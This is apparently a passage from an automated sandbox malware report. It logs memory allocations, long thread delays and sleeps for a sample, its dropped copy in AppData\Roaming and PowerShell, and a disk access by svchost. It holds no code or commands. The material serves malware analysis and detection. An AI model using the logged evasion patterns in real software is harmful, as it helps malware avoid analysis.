                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: 51E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: 90A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: A0A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: A2A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: B2A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: B910000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: C910000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: 3000000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: 30F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: 3000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599424Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598953Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598719Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597749Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597516Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597282Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597157Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597032Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596688Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596563Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596438Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596328Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596094Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595141Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595000Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594891Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594782Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594657Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594547Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599859
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599744
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599625
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599514
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599393
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599125
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599016
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598891
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598672
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598557
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598438
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598313
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598203
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598094
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597969
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597859
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597712
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597594
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597484
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597375
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597265
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597156
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597047
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596937
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596828
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596719
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596609
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596500
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596391
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596281
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596171
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596062
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595953
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595844
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595734
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595625
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595516
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595406
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595297
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595187
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595078
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594969
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594859
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594750
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594641
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594531
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594422
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6472Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 607Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6897Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 470Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeWindow / User API: threadDelayed 1921Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeWindow / User API: threadDelayed 7918Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeWindow / User API: threadDelayed 2334
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeWindow / User API: threadDelayed 7523
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 6484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep count: 6472 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5912Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep count: 607 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4712Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5912Thread sleep count: 1921 > 30Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5912Thread sleep count: 7918 > 30Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -599424s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -599297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -599188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -599063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -598953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -598844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -598719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -598610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -598485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -598360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -598235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -598110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597749s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -597032s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -596922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -596813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -596688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -596563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -596438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -596328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -596203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -596094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595141s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -595000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -594891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -594782s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -594657s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -594547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -594438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -594328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512Thread sleep time: -594219s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 7044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 1340Thread sleep count: 2334 > 30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -599859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 1340Thread sleep count: 7523 > 30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -599744s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -599625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -599514s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -599393s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -599234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -599125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -599016s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -598891s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -598781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -598672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -598557s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -598438s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -598313s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -598203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -598094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597712s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597594s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597484s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597375s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -597047s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596937s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596391s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596281s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596171s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -596062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595516s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -595078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -594969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -594859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -594750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -594641s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -594531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464Thread sleep time: -594422s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6484Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1972Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599424Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598953Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598719Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 598110Jump to behavior
